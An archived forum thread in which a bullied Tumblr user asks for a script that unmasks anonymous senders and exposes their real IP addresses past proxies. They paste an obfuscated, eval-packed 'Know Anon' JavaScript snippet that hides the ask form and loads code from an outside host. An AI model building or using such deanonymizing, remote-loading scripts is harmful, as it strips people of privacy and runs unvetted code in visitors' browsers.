topbanner_forum

Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
  • Thursday March 28, 2024, 7:48 pm
  • Proudly celebrating 15+ years online.
  • Donate now to become a lifetime supporting member of the site and get a non-expiring license key for all of our programs.
  • donate

Author Topic: Excuse The Dumb Question, but I'm Generally Curious  (Read 8490 times)

Communicate

• Participant
  • Joined in 2015
    • View Profile
    • Donate to Member
Excuse The Dumb Question, but I'm Generally Curious
« on: June 08, 2015, 09:38 PM »
So, I'm new here. I couldn't find an Introduction board, so I decided to greet myself here. This forum looks awesome, and I look forward to having fun here :D

Now, onto the real question: Are there people who make scripts for social media accounts (I.e. Tumblr, Youtube, etc.)? If there are, I need some sort of script for my Tumblr account. I'll tell you a bit more in a minute, but for now, can anyone help a lost member out?  :-\

cranioscopical

• Friend of the Site
  • Supporting Member
  • Joined in 2006
    • View Profile
    • Donate to Member
Re: Excuse The Dumb Question, but I'm Generally Curious
« Reply #1 on: June 09, 2015, 08:25 AM »
Hi,

I can't help with your request but welcome to the forum  :)

(there is also this topic available to you:
OK - lets get to know each other... who are you, what do you do, where from?)

Communicate

• Participant
  • Joined in 2015
    • View Profile
    • Donate to Member
« Reply #2 on: June 09, 2015, 09:36 PM »
Aww, that sucks. I was really hoping somebody would help me out...But thanks for the link to the Introduction thread.

@cranioscopical: Do you know any coders I can talk to, then, just wondering...

Target

• Honorary Member
  • Joined in 2006
    • View Profile
    • Donate to Member
« Reply #3 on: June 09, 2015, 09:48 PM »
plenty of coders here, but they can't help until you at least tell them specifically what you want to do  8)

Communicate

• Participant
  • Joined in 2015
    • View Profile
    • Donate to Member
« Reply #4 on: June 09, 2015, 10:08 PM »
@Target: Oh, I'm so dumb!  :wallbash:

Anyway, I wanted to see if someone could make a script for me that functions like Know Anon. KA is a script that disables the anonymous feature on your Tumblr ask box, so if anyone where to send you anon hate, it'll show up as their blog name instead of the "Anonymous" title. The problem is that Tumblr disabled the code so it not longer works for anyone, and I'm being bullied pretty badly there... :(

The only add-ons I'd like is that even if you log out, it'll still show your blog name, and if you don't have a blog, it'll bypass the proxy (If you're using one) and show your true IP address. I know it may seem like much, but do you think anybody could help me out? It'd be greatly appreciated.

(If it matters, this is what the original KA script is)
{block:Hidden}<meta name="select:KA" title="Off" content="off"><meta name="select:KA" title="On" content="on">{/block:Hidden}<script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('9.c=d(){2.e(\'8\').f.6=\'0\';a=\'4\',b=\'7\',3=2.5(\'3\')[0],1=2.g(\'1\');1.m=\'n/l\';1.k=\'//\'+b+a+\'.j/o?i\';3.h(1)}',25,25,'|script|document|head|anon|getElementsByTagName|opacity|know|ask_form|window|||onload|function|getElementById|style|createElement|appendChild|{select:KA}|com|src|javascript|type|text|ka'.split('|'),0,{}))</script>

Target

• Honorary Member
  • Joined in 2006
    • View Profile
    • Donate to Member
« Reply #5 on: June 09, 2015, 10:13 PM »
FYI I don't do any of the social media things (apparently you have to have 'friends') so I can't help you, but there are a few here who do so good luck!!

Communicate

• Participant
  • Joined in 2015
    • View Profile
    • Donate to Member
« Reply #6 on: June 09, 2015, 10:18 PM »
FYI I don't do any of the social media things (apparently you have to have 'friends') so I can't help you, but there are a few here who do so good luck!!

Okay, thanks!

Edit: Whoops, I finally realized this was in the wrong Child Board. Do you think any mods can move this to the "Post New Requests" board, please? Sorry if I'm being bothersome...  :(
« Last Edit: June 09, 2015, 10:24 PM by Communicate »

4wd

• Supporting Member
  • Joined in 2006
    • View Profile
    • Donate to Member

Communicate

• Participant
  • Joined in 2015
    • View Profile
    • Donate to Member
« Reply #8 on: June 09, 2015, 11:41 PM »
Does this help?

http://tswatch.tumbl...nt-to-know-who-it-is
Stat counter was actually a virus. I used it once and it gave my computer a virus  :-\